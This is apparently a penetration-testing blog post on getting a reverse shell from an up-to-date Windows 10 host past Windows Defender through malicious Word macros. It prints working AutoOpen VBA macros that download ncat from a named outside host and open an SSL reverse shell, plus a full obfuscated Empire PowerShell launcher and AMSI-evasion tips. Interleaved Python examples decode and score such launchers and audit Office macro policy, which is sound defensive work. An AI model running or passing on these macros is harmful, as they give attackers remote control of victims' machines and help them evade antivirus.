Powershell Empire - Macro

Bypassing AMSI with Obfuscation

Six years on, advances in both operating-system security and "hacking" tools have made this type of attack less likely; however, another option for gaining a foothold on Windows 10 came to light with the use of macro documents.

Target: Windows 10 Enterprise, Redstone 5 1809 Oct


What we are up against:

How effective is the latest Windows Defender at alerting the user to malicious activity? The following account illustrates it:

"At 11:17 a.m. local time on October 24, a user running Windows Defender AV in St. Petersburg, Russia was tricked into downloading a file named FlashUtil.exe from a malicious website. Instead of a Flash update, the program was really the just-released Tibbar ransomware.

Windows Defender AV scanned the file and determined that it was suspicious. A query was sent to the cloud protection service, where several metadata-based machine learning models found the file suspicious, but not with a high enough probability to block. The cloud protection service requested that Windows Defender AV client to lock the file, upload it for processing, and wait for a decision.

Within a few seconds the file was processed, and sample-analysis-based ML models returned their conclusions. In this case, a multi-class deep neural network (DNN) machine learning classifier correctly classified the Tibbar sample as malware, but with only an 81.6% probability score. In order to avoid false positives, cloud protection service is configured by default to require at least 90% probability to block the malware (these thresholds are continually evaluated and fine-tuned to find the right balance between blocking malware while avoiding the blocking of legitimate programs). In this case, the ransomware was allowed to run.

Detonation chamber

In the meantime, while patient zero and eight other unfortunate victims (in Ukraine, Russia, Israel, and Bulgaria) contemplated whether to pay the ransom, the sample was detonated and details of the system changes made by the ransomware were recorded.

Figure 4. Sample detonation events used by the machine learning model

As soon as the detonation results were available, a multi-class deep neural network (DNN) classifier that used both static and dynamic features evaluated the results and classified the sample as malware with 90.7% confidence, high enough for the cloud to start blocking.

When a tenth Windows Defender AV customer in the Ukraine was tricked into downloading the ransomware at 11:31 a.m. local time, 14 minutes after the first encounter, cloud protection service used the detonation-based malware classification to immediately block the file and protect the customer.

At this point the cloud protection service had “learned” that this file was malware. It now only required metadata from the client with the hash of the file to issue blocking decisions and protect customers. As the attack gained momentum and began to spread, Windows Defender AV customers with cloud protection enabled were protected. Later, a more specific detection was released to identify the malware as Ransom:Win32/Tibbar.A."


It seems there have been advances in malware detection since 2013, and Windows Defender has grown in its capabilities. From the article we learn that Windows Defender AV acts as a HIDS (host intrusion detection system): it continuously scans the files on the host, takes samples of programs being run and submits their behaviour to the cloud, where it is judged whether the file should be permitted to run.

Here we will test whether we can bypass these restrictions and receive a reverse shell from a Windows 10 Pro host with fully updated virus signatures in Windows Defender:

The payload:

We did not have to try hard: a simple netcat reverse shell provided a stable session.

Simple netcat reverse shell from Windows 10 to Linux

Well, that was quick. The problem with this approach, however, is that the connection has no form of encryption, so Wireshark is able to capture and display in clear text the conversation that took place between the two hosts:

Our next step was to find a remedy for this situation. Generic netcat does not offer encryption, but the more powerful ncat does:

Here we see that specifying the --ssl option takes care of the encryption part.

However, because of an SSL version mismatch we may encounter the following error when trying to catch the shell on Ncat 7.70 (tested on a recent ParrotOS 4.5):

Ncat 5.52.IPv6.Beta2 to Ncat 7.70 --ssl option error.

Since I could not find a solution for receiving a stable ncat connection (please let me know if you have solved this problem), I used openssl as a handler:

# generate a self-signed certificate and key (valid for one year, key not passphrase-protected)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
# listen on port 4444 and terminate TLS for the incoming connection
openssl s_server -key key.pem -cert cert.pem -port 4444

It seems that establishing a connection from a Windows 10 host using generic administrative tools is not detected by Windows Defender; payload delivery, however, can be the more difficult task to accomplish.

Let's try to upload a Meterpreter payload to see how Windows Defender responds to that. I am using the latest Metasploit v5.0.0-dev framework with the added evasion module:

Payload generation:

msf5 evasion(windows/windows_defender_exe) > info

       Name: Microsoft Windows Defender Evasive Executable
     Module: evasion/windows/windows_defender_exe
   Platform: Windows
       Arch: x86
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  sinn3r <sinn3r@metasploit.com>

Check supported:

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  scV.exe          yes       Filename for the evasive file (default: random)

  This module allows you to generate a Windows EXE that evades against
  Microsoft Windows Defender. Multiple techniques such as shellcode
  encryption, source code obfuscation, Metasm, and anti-emulation are
  used to achieve this. For best results, please try to use payloads
  that use a more secure channel such as HTTPS or RC4 in order to
  avoid the payload network traffic getting caught by antivirus

msf5 evasion(windows/windows_defender_exe) > options

Module options (evasion/windows/windows_defender_exe):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  scV.exe          yes       Filename for the evasive file (default: random)

Payload options (windows/x64/meterpreter/reverse_https):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
  LHOST                      yes       The local listener hostname
  LPORT     4444             yes       The local listener port
  LURI                       no        The HTTP Path

Evasion target:

  Id  Name
  --  ----
  0   Microsoft Windows

msf5 evasion(windows/windows_defender_exe) > run
[*] Compiled executable size: 4608
[+] scV.exe stored at /root/.msf4/local/scV.exe

Well, that did not go well... Our downloaded payload, even though it was encrypted and multiple techniques were used to obfuscate the code, was still flagged as malicious.

All is not lost, but getting Meterpreter functionality on the Windows host is going to take time and another project.

Payload delivery methods:


When Microsoft introduced macro capabilities into its Office suite, the automated scripts were enabled by default. That meant when one individual emailed a macro-embedded Word or Excel document to another, the macro automatically executed when the receiver opened the document. Malware authors soon exploited this functionality, embedding malware executables as macros and emailing the documents to unwitting targets.


Symantec 2017 report - Sounds like fun, let's do it!


We will try to recreate the above attack to show how effective it is, so that we can think of ways of preventing it.

Enabling Macro options by selecting the Developer tab.

Place the code below in the macro section of the Word document. The payload executes PowerShell to download the compressed ncat_upx binary, reconnect to the attacker every 30 seconds and wrap the session in SSL.

Sub AutoOpen()
Dim exec As String
exec = "cmd /c powershell.exe -nop -w hidden iwr -outf %tmp%\\ncat.exe https://trunk.shinnok.com/ncat_upx.exe & FOR /L %N IN () DO @TIMEOUT /t 30 & %tmp%\\ncat.exe 4444 -e cmd.exe --ssl"
Shell (exec)
End Sub

To improve upon our payload we can encode it, as PowerShell allows running base64-encoded commands. First create the encoded command in PowerShell:

[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell -nop -w hidden iwr -outf %tmp%\\ncat.exe https://trunk.shinnok.com/ncat_upx.exe & FOR /L %N IN () DO @TIMEOUT /t 30 & %tmp%\\ncat.exe 4444 -e cmd.exe --ssl'"))

Improved macro payload:

Sub AutoOpen()
Dim exec As String
Shell (exec)
End Sub

Here we also pipe the output to the command prompt for execution.

Security warnings presented to the user when the malicious Microsoft Word document is opened.

Once the user enables the content, the reverse shell connects back to the attacker.
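The macro above hands PowerShell a command that a process-creation log (Sysmon event 1, or Security event 4688 with command-line auditing) records verbatim, and the base64 step only hides it from a casual glance. The following Python is added here as an example and is not part of the original post: it reverses the encoding exactly as PowerShell's -EncodedCommand does (base64 of UTF-16LE) and scores the decoded text for the traits of this payload, namely the hidden window, the web download into %tmp%, the FOR /L retry loop and the hand-off to cmd.exe. The command lines and the host name example.invalid are constructed for the example.

```python
import base64
import re

# Constructed sample (not from the original post): a command built the way the
# macro above builds it, then wrapped the way PowerShell's -EncodedCommand
# expects (UTF-16LE, then base64). The host name is a placeholder.
INNER_COMMAND = (
    "powershell -nop -w hidden iwr -outf %tmp%\\tool.exe "
    "https://example.invalid/tool.exe & FOR /L %N IN () DO @TIMEOUT /t 30 "
    "& %tmp%\\tool.exe 4444 -e cmd.exe --ssl"
)


def encode_utf16le_base64(text: str) -> str:
    """Mirror [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(...))."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed process-creation command lines, as a Sysmon event 1 or a
# Security 4688 event with command-line auditing would record them.
SAMPLE_COMMAND_LINES = [
    "C:\\Windows\\System32\\cmd.exe /c dir C:\\Users",
    "powershell.exe -NoProfile -EncodedCommand " + encode_utf16le_base64(INNER_COMMAND),
    "powershell.exe -enc " + encode_utf16le_base64("Get-Process | Sort-Object CPU"),
]

# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Traits of the macro payload discussed above, each as a separate indicator.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-no(?:p|profile)\b", re.I),
    "web_download": re.compile(r"\b(?:iwr|invoke-webrequest|downloadfile|downloadstring)\b", re.I),
    "temp_drop": re.compile(r"%tmp%|\$env:temp", re.I),
    "retry_loop": re.compile(r"FOR\s+/L\s+%\w+\s+IN\s*\(\s*\)", re.I),
    "shell_handoff": re.compile(r"-e\s+cmd(?:\.exe)?\b", re.I),
}


def decode_encoded_command(command_line: str):
    """Return the UTF-16LE text behind an -EncodedCommand argument, or None."""
    match = ENCODED_ARG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a real encoded command (or truncated by the logger)


def analyse(command_line: str) -> dict:
    """Decode if needed, then score the visible and decoded text together."""
    decoded = decode_encoded_command(command_line)
    text = command_line + "\n" + (decoded or "")
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {"encoded": decoded is not None, "decoded": decoded,
            "indicators": hits, "score": len(hits)}


def triage(command_lines):
    """Analyse a batch of command lines, most suspicious first."""
    return sorted((analyse(c) for c in command_lines), key=lambda r: -r["score"])


if __name__ == "__main__":
    for report in triage(SAMPLE_COMMAND_LINES):
        print(report["score"], report["indicators"], (report["decoded"] or "")[:60])
```

Scoring the decoded text together with the visible one matters because the outer launcher often carries nothing suspicious beyond -EncodedCommand itself. The score is a triage aid rather than a verdict: a single indicator such as -NoProfile is common in legitimate automation, whereas the combination of a hidden window, a download into %tmp% and an endless retry loop is not.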

Alternative method using Empire:

Setting up a listener first:

Next we need to set up a payload; in this case we will use a macro document:

Breakdown of Token\All\1,Token\All\1,COMPRESS\1,Launcher\PS\123467



LAUNCHER - PS - powershell

For this part to work we need to use the latest Invoke-Obfuscation repository, as the one included in the Empire framework does not support COMPRESS. Compression was introduced in v1.8.1; it also removes the troublesome " (double quote) character, which the macro script cannot process and which would leave the rest of our code mangled.

Content directory that will need to be replaced:




Macro script to be placed in the Microsoft Office Word macro editor:

Sub Auto_Open()
End Sub
Sub AutoOpen()
End Sub
Sub Document_Open()
End Sub
Public Function yndhN() As Variant
Dim Dp As String
Dp = "pOWeRshEll -NoNInterAcTI -noe -noP -EX BypaSS -noLO -WINDO HIdDen "
Dp = Dp + " ( nEw-ObjeCt Io.cOmPREsSI"
Dp = Dp + "ON.deFLAteSTReAm([SYsTeM.Io.memorYstReam] [CoNVeRt"
Dp = Dp + "]::froMbasE64STRIng( 'bVmLTuPIEv0Vy5rFiQge8uIpdBWC"
Dp = Dp + "Ac+EhE1CmAihbZMY8GCcrO3AcrP+91un2nbczpV2Mh53u+t1qu"
Dp = Dp + "pU707FiD6MqlbR1/VkvZ/o2t6z8XVp1IwreqtVNO1hPL11H2m9"
Dp = Dp + "nawPk3UDu9bHybqZrOv4Q//RuwP6C4+0dpSsW3yOZphXdNCFRz"
Dp = Dp + "/ByKjRGfv4QK71rZDeezOjWisK1wx3FtPC7+J7vO5Zs7FNC7NF"
Dp = Dp + "Ty7xWaQPq2wPaKlPfzrh9IHWjYVROvbGXJzTejR2sWzRYy2aqp"
Dp = Dp + "sMr/9C70dxiC3dMT2b8EJVO9U0k3Y2ErmZjOdDCwoazpC2703w"
Dp = Dp + "JT4cWWUFepDpdc6NKhyr2PZJK/N4alR39bqO1Yc4dfo+e7yZuu"
Dp = Dp + "3SGM1o62L2k35De0m/4yc/V3En9zDpE9GiGyO0Rtg7N3aNxqWM"
Dp = Dp + "6MP4a2k9qsEIodszaXbKdtbTOLNyN2xNbBTDYcQurPWkLRvHsB"
Dp = Dp + "cHEe8tviPr3ZMr/wd9hCA4paBT1ACSDxxHCmbGNxlXrSSFnvSF"
Dp = Dp + "dIRczSEACbcDwKMP8Lw7gELXQjCAMufKLUeDDRh9RdgSlxc/EP"
Dp = Dp + "nIDbew2Yefbkx85CnIUDRJY5/7FwLIWTEj793IXSY/auKjTEyG"
Dp = Dp + "Z8+huNYMYMo6ad/iw1d6njj08/fB1FD81EjPwffsrdRDeQSg1N"
Dp = Dp + "i8h2fMPgxnz0xHyAdDtR9bh9afK2w650yJACICxk5B6YLG/IXd"
Dp = Dp + "eYKJH5QE9AkjPbLGsq4oeRrQyucd/Ry7DSxTdVmyDa00r9IQ71"
Dp = Dp + "1qOfozkLrvpiGTK7DU6mBcy9zqdTvdvDgUvuyiDLkMjSGbbqpo"
Dp = Dp + "jrAymgJ+FFGzaKiUHBcCSvv3bIbPDY6K0ng2k00EUQ5UCT3rBJ"
Dp = Dp + "5+wheDdqsMOIR10gltmU8U2TRFmyrqjWmUfbnJzxcuUxSooDuY"
Dp = Dp + "20GhOErskdtgnvUrztUlI+3Lyrf17UhMhBuO7EF/7DwJ30pMfS"
Dp = Dp + "miD2sYCXvR10393RE/FkM66MXVmtX1t/WLWF4mZ9wZzBJoqYwg"
Dp = Dp + "Az865VLvPPUk5qqagppLxasap6p/3sC+vUlHq5q6E0XCfRfn/l"
Dp = Dp + "Q3i2cqxYMghH5lxbKw02defyIGb65ekW2rkWGrnremYmzMzirm"
Dp = Dp + "LFAxBZ96i9SfxWxlHCNiL5xQN3h0392g3LEcnLp4L7+OPR9QuC"
Dp = Dp + "vXwE1FqpIJZM6lZ4nenI3IczsrMsbs1TX+j2JUBhc+aunsC9kN"
Dp = Dp + "x7i5BRsdoIAXQP+YvTZzyjGbw6XhYkXaoLHu5qKaWRIEak5AXO"
Dp = Dp + "zE3NDT7puv3a6efA+dqwbjJPauACQg6krcdpOz9IXSfdJAFbSa"
Dp = Dp + "OP4qNcm4ShucqduBSOP9bd1fCb+XkIznSnr0QymdDQ9eidGHRj"
Dp = Dp + "Mq8btbefbMkWX3eNv51ltgwec+/Eb2PEojllJSvah5jqUli5tR"
Dp = Dp + "lyPFR1KmotOLl0pUEsKHhBpLJDkP5XwrH0I9w4VJNWlikBEdEs"
Dp = Dp + "4SiyYWw0NiaNdbb4EPXtTC5aFiv7D8s/3TgksLPknNS0VLWcUg"
Dp = Dp + "ZoYpHY5l+lIuzucv2casYYBJtpOUBRwy/I+ZYupFXNBRVuA88W"
Dp = Dp + "F0iMsMKfRKnjxPXWmzoIVsemUIfyyQB1wIjGW+XEgciQsZkRdP"
Dp = Dp + "+iT5tp6ITg81Ed75ek5OTpR8tz6ZmgKnfTEZvFl6pUqO/MBHpr"
Dp = Dp + "JzfgECywUsmCwEdhajBktLhFU6nmFV0pS96yIp4ZxqFpPc/yrv"
Dp = Dp + "BZg5CGq6ZcCAQwIs7yuaF3Z2wGDnMhlJ9Z+y9h7KiHEApRltDu"
Dp = Dp + "NRXkcBAHekQu7NDji5ttgXe59dH6RFBkxNcWHopanG2A8cNcCw"
Dp = Dp + "hkoU4xy8WdpDLW1GkE6bRf1QjjKoc8dJyksw4hzLKUeisy7bSr"
Dp = Dp + "2VTkFYOWLDDlmS3bfou9HiOf50QndNchOedsJFRO9o6d4L5ovP"
Dp = Dp + "iANeM67TP54brUvcMUvomNkYLcipqWbsbw0Yf91I/NBaQm2ghJ"
Dp = Dp + "Vw9JqVzjXWP5nB4E05NzXjL3r/05oC6QMwKsNHoLrcmZ8fZq9O"
Dp = Dp + "+HjcyDCVFc8sQXzV6S+yhGyBa1N0KI0YVX6SWP7IWhO5MCuGPz"
Dp = Dp + "K2BiXfPWGGEXoA9W4RNVPQ2wvinLtGHYTV1D+cnriziMRcudRL"
Dp = Dp + "XeHLXlrPaOZ2IVmFLlNi8CQvrREvAaaVtAVmuZiT9iJnlVZxeG"
Dp = Dp + "qjGJVkxSQ+uJXVTZ5HyKwqE4OmKkHjA5SIJywWxOnO5ZIg+pMF"
Dp = Dp + "SgL1OHHn+0mtUmLkmjEoQ0LO0k+/y1xjDyXJvU8ZWW6VxHszn+"
Dp = Dp + "MPGfLtUj/L8rabTeJ5DBDosc3p5SK619mE8WjIfs0bNsW5kWse"
Dp = Dp + "MdvqmtcOU7nAGm5lP86y4gcwiGrCBHRnO5o0XpVgduXy9LV1XI"
Dp = Dp + "zO2Lvgjty9tnlW+ejou0ryDT1k57mPydwqrNHSyRCxAVvd1S8x"
Dp = Dp + "tFOMiJ6IO5cQ54gost7Pe19btHUTLOYvYxrGc9rKpXNDW1vs/S"
Dp = Dp + "O2Lq+kzczXfqSmWec9kt1Xwuwu9ra6l4l0f0dI5Cg6+kI9VIvv"
Dp = Dp + "gmvvO1XJUk9hpwUxkWUc4nJjeXHlMFWt/rtTMf5jgAn9lST/Uv"
Dp = Dp + "b+kf7DVGBj9S5KVYkykyOOrGCMD9K2V7xrQUENsO+d09IpFX0X"
Dp = Dp + "ZDW+dDwfbFUOkyVGpw4ewCYxUk7LWelig1l7bYS1VTmdFpTK3M"
Dp = Dp + "tlCiu08M4q8WELkyrfB3V6Rm6cW0jgb+tYDFdWUk1Ok1PQhxfR"
Dp = Dp + "E78HI2IQuvWPWFozMRb1/f3uIIht0adaxhTsk+jyjhpaVU1O+v"
Dp = Dp + "PfHJzB9r3bvcwHNfVbmwliNOWBBhk5ilX+i4j1YRd6bNe33a2q"
Dp = Dp + "ztcLsXnv4jLp2/ouOUuD2cqrCpeU9ApRXuvw1SHbUVHSbx8Dg4"
Dp = Dp + "aoYkZ5Q229wc9JqUf+F6jwfec7R3SeraqVWeuPtQMYddA61cZo"
Dp = Dp + "qgN4on6q3eOzeh2XAnm7yWiqVrmXvdZIG3ZVQqw07ms4L4i/H5"
Dp = Dp + "r7p5KWyE7bNssYenM13EYhU9lDnzMaul8tR8wtMYx0U929oYR2"
Dp = Dp + "/0NkuVGeAooVH/nbUbotozOCzHBPlocqQW+VQPq9gPjb4UD886"
Dp = Dp + "WfZVN9sTepI+3Q7rB5IFDwuVW444Ef2mW4LUE6/j744psNLpGi"
Dp = Dp + "t3J1QviFcC9F50748b11LpbhgDTINVqKIf5t6rOhJS6sYCzsTm"
Dp = Dp + "+ka8SylasH1qprS4KxAXRrM6eq7gltvmpxVP8Y93fH8E8DdgHa"
Dp = Dp + "1gmzfC5KxO79O9Z4Llxx2Vn1xn1r/CkG4c9Z6M7dPulGRo2gfC"
Dp = Dp + "S6oXcbnyzZoQmpSwEWXbiYDPo1xZ43vj7ZUcIzB4CH6U1S4S6x"
Dp = Dp + "WJnO0XM/KAJMDNyTqDTiwDBcLaWO/nCEv7KgdmckZratb1WsSK"
Dp = Dp + "18sBvNEjeDY9mP+qDyVtaPJCHIinJ6NZumyeF8o03OIp3Dgzbm"
Dp = Dp + "goP6/KiZufdYUk5j9oyn9nOrZMbTEb0+4q1P7RJ/n6Nwz5pp5g"
Dp = Dp + "yTM2oxc9TRN1wgOKG4ihJaGCVn+6bZaLdP5V9oTrIf/aZy9G39"
Dp = Dp + "I9mlUCUP6E+Pu/iaH//Ak6l3xeKuH+uP1T8a7QM+TW6spd/8Tk"
Dp = Dp + "BX+fHH5i1tgOh5shHmsTAv2a1nR13zm2uI51O9JJfCh9h8Hi+9"
Dp = Dp + "bqS8bqTQhlPI2nv6tQh5ZyVd8diS7FM+9TFJGJIWOUp6sZVV+/"
Dp = Dp + "am2iM/D47MUkttmHXUxuMycWwhOCetVqu8sDz5/t1Ir5OUhTpq"
Dp = Dp + "Z92U7SBmTXIxam5i5DapXpRbyvcAeOHSy/WhywWzQ/UjLNZLbO"
Dp = Dp + "VqOc+7bTqG5vjplqvTAt3kzXNT3nCQbOp6K51X8yzMbzvqrw1Q"
Dp = Dp + "rbNGC7XwV1jnYTRIqS4y+fufVoF8NXP1zphboW52pv/g+fN+tj"
Dp = Dp + "tfbFkcuZGcQ9jiuejEDgDOpbHEnJXcueCm1t/+/2M0GnQuLtJh"
Dp = Dp + "M+YR0Zf3DGKy+MmchHASAphj7gu2mEAiRHeSB0qjJoA374gxa3"
Dp = Dp + "LhiDG9b5kmPYsOvTR1X1iBuBq/6o+nez8GXv+h+9oJHx4fKzsa"
Dp = Dp + "clWTXzmJVpHHc+Ixcyy2chu0/JdR/R8=') , [sYsTem.Io.CO"
Dp = Dp + "MpreSSIoN.cOmPrEsSiOnMode]::dECOMPrEsS )|FOrEACH-o"
Dp = Dp + "bjECt{nEw-ObjeCt systEM.io.sTREaMrEADeR($_ ,[sYSt"
Dp = Dp + "Em.TExt.eNCoDInG]::aScII) } | foReACh-ObjeCt {$_.r"
Dp = Dp + "EADTOenD( )} )|.( $PsHome[21]+$PShOME[34]+'x')""
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create Dp, Null, objConfig, intProcessID
End Function

Note the amended first PowerShell line: the macro will not accept " inside the quotes.
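The Invoke-Obfuscation COMPRESS launcher leaves fingerprints that a defender can key on without knowing what the blob contains: random casing of names that tools and people spell one way, switch names cut down to prefixes, a FromBase64String + DeflateStream + Decompress wrapper, and the "iex" verb assembled from characters of $PSHome. The Python below is an added example, not the post's or Empire's code: it scores those traits and also unwraps the payload, since .NET's DeflateStream is raw DEFLATE that zlib inflates with wbits=-15. The launcher it analyses is constructed around a harmless inner script and is not the base64 from the macro above.

```python
import base64
import re
import zlib

# Constructed sample (not the post's real launcher): the inner script is
# harmless; the wrapper copies the shape Invoke-Obfuscation's COMPRESS option
# produces (random casing, deflate + base64, "iex" built from $PSHome indexes).
INNER_SCRIPT = "Write-Output 'hello from the unwrapped script'"


def deflate_base64(text: str) -> str:
    """Raw DEFLATE (what .NET DeflateStream reads, no zlib header) then base64."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(comp.compress(text.encode("ascii")) + comp.flush()).decode("ascii")


SAMPLE_LAUNCHER = (
    "pOWeRshEll -NoNInterAcTI -noe -noP -EX BypaSS -noLO -WINDO HIdDen "
    " ( nEw-ObjeCt Io.cOmPREsSION.deFLAteSTReAm([SYsTeM.Io.memorYstReam] "
    "[CoNVeRt]::froMbasE64STRIng( '" + deflate_base64(INNER_SCRIPT) + "') , "
    "[sYsTem.Io.COMpreSSIoN.cOmPrEsSiOnMode]::dECOMPrEsS )|FOrEACH-objECt{"
    "nEw-ObjeCt systEM.io.sTREaMrEADeR($_ ,[sYStEm.TExt.eNCoDInG]::aScII) } | "
    "foReACh-ObjeCt {$_.rEADTOenD( )} )|.( $PsHome[21]+$PShOME[34]+'x')"
)

# Spellings a person or a tool would normally produce; any other casing that
# matches case-insensitively is random-case obfuscation.
CANONICAL = ["PowerShell", "FromBase64String", "DeflateStream", "CompressionMode",
             "Decompress", "StreamReader", "ReadToEnd", "ForEach-Object", "New-Object"]

# powershell.exe accepts any unambiguous prefix of these switch names.
FULL_PARAMS = ["noninteractive", "noexit", "noprofile", "executionpolicy",
               "nologo", "windowstyle", "encodedcommand", "command", "file"]

B64_ARG = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'", re.I)


def odd_casing_hits(text: str) -> list:
    """Known names whose casing is neither canonical, all-lower nor all-upper."""
    hits = []
    for word in CANONICAL:
        for m in re.finditer(re.escape(word), text, re.I):
            if m.group(0) not in (word, word.lower(), word.upper()):
                hits.append(m.group(0))
    return hits


def abbreviated_params(text: str) -> list:
    """Switches given as a strict prefix of a powershell.exe parameter name."""
    hits = []
    for tok in re.findall(r"-([A-Za-z]+)\b", text):
        low = tok.lower()
        if any(low != full and full.startswith(low) for full in FULL_PARAMS):
            hits.append("-" + tok)
    return hits


def unwrap_deflate_launcher(text: str):
    """Recover the script hidden behind a base64 + DeflateStream wrapper."""
    m = B64_ARG.search(text)
    if not m:
        return None
    try:
        return zlib.decompress(base64.b64decode(m.group(1)), -15).decode("ascii", "replace")
    except (ValueError, zlib.error):
        return None


def analyse_launcher(text: str) -> dict:
    """Score the four launcher traits and attach the unwrapped script, if any."""
    report = {
        "odd_casing": odd_casing_hits(text),
        "abbreviated_params": abbreviated_params(text),
        "deflate_wrapper": bool(re.search(r"frombase64string", text, re.I)
                                and re.search(r"deflatestream", text, re.I)),
        "index_built_invoke": bool(re.search(r"\$pshome\[\d+\]", text, re.I)),
        "inner_script": unwrap_deflate_launcher(text),
    }
    report["score"] = sum([bool(report["odd_casing"]), bool(report["abbreviated_params"]),
                          report["deflate_wrapper"], report["index_built_invoke"]])
    return report


if __name__ == "__main__":
    result = analyse_launcher(SAMPLE_LAUNCHER)
    print(result["score"], result["abbreviated_params"])
    print("inner script:", result["inner_script"])
```

Unwrapping is for analysing a sample you already hold; in a detection pipeline the four flags alone are enough to raise the event, and a legitimate launcher such as powershell.exe -NoProfile -File backup.ps1 scores zero. The casing check compares against a fixed list of spellings rather than trying to define "random", which keeps PascalCase .NET names and all-lower cmdlet names from being flagged.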

Once the victim enables the document content we get:

Bonus tip:

Of course our obfuscated payload executed correctly, but any further scripts we invoke from Empire will not be obfuscated, which means some of them can be detected by Windows Defender's AMSI and blocked.

The solution to that problem is to run preobfuscate in the Empire menu, which obfuscates all the scripts we would like to run on the target machine.

Example of Get-FoxDump.ps1 after obfuscation:

In conclusion, this type of attack is still valid even on the latest Windows 10 with an up-to-date Windows Defender. The best way to avoid becoming a victim is to disable macros across workstations, or to invest in user awareness training (examples like these are a good way to show employees the dangers of running unsolicited macro code).
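Disabling macros across workstations is done through the Office Group Policy values VBAWarnings (the macro notification setting) and blockcontentexecutionfrominternet, written under Software\Policies\Microsoft\Office\<version>\<application>\Security. The Python below is an added example and not from the original post: it parses a .reg export of that hive and reports, per application, whether a user can still click Enable Content, which is the step this attack depends on. The export text is constructed for the example; the value names and their meanings are the real policy ones, and the sample covers only the HKCU hive and three applications.

```python
import re

# Constructed .reg export (not from the original post). A real export from
# "reg export HKCU\Software\Policies\Microsoft\Office" is UTF-16LE text with
# the same layout; the three applications show three different states.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Word\Security]
"VBAWarnings"=dword:00000004
"blockcontentexecutionfrominternet"=dword:00000001

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Security]
"VBAWarnings"=dword:00000002
"blockcontentexecutionfrominternet"=dword:00000001

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\PowerPoint\Security]
"blockcontentexecutionfrominternet"=dword:00000000
"""

# Meaning of the VBAWarnings policy value ("VBA Macro Notification Settings").
VBA_WARNINGS = {
    1: "enable_all",
    2: "disable_with_notification",   # the default: the user sees "Enable Content"
    3: "disable_except_signed",
    4: "disable_without_notification",
}

SECTION = re.compile(r"^\[(.+)\]$")
DWORD = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')
SECURITY_KEY = re.compile(r"\\Office\\(\d+\.\d+)\\(\w+)\\Security$", re.I)


def parse_reg_export(text: str) -> dict:
    """Map each [key] to its DWORD values; other value types are ignored here."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        section = SECTION.match(line)
        if section:
            current = keys.setdefault(section.group(1), {})
            continue
        value = DWORD.match(line)
        if current is not None and value:
            current[value.group(1).lower()] = int(value.group(2), 16)
    return keys


def audit_macro_policy(text: str) -> dict:
    """Per Office application: can a user still click through to run a macro?"""
    result = {}
    for key, values in parse_reg_export(text).items():
        m = SECURITY_KEY.search(key)
        if not m:
            continue
        vba = values.get("vbawarnings")
        state = VBA_WARNINGS.get(vba, "not_configured")
        result[m.group(2)] = {
            "vba_warnings": vba,
            "macro_policy": state,
            "blocks_internet_macros": values.get("blockcontentexecutionfrominternet") == 1,
            # not_configured falls back to the default notification bar
            "user_can_enable_content": state in ("enable_all", "disable_with_notification",
                                                 "not_configured"),
        }
    return result


if __name__ == "__main__":
    for app, state in audit_macro_policy(SAMPLE_REG_EXPORT).items():
        print(app, state["macro_policy"], "user can enable:", state["user_can_enable_content"])
```

Only values 3 and 4 take the Enable Content button away; value 2 (and an unconfigured policy) still shows the notification bar the user is tricked into clicking. blockcontentexecutionfrominternet is a worthwhile second layer, but it acts on the mark of the web, so a document that arrives without that marker is not covered by it, and the same values should be checked under HKLM and for every Office application in use.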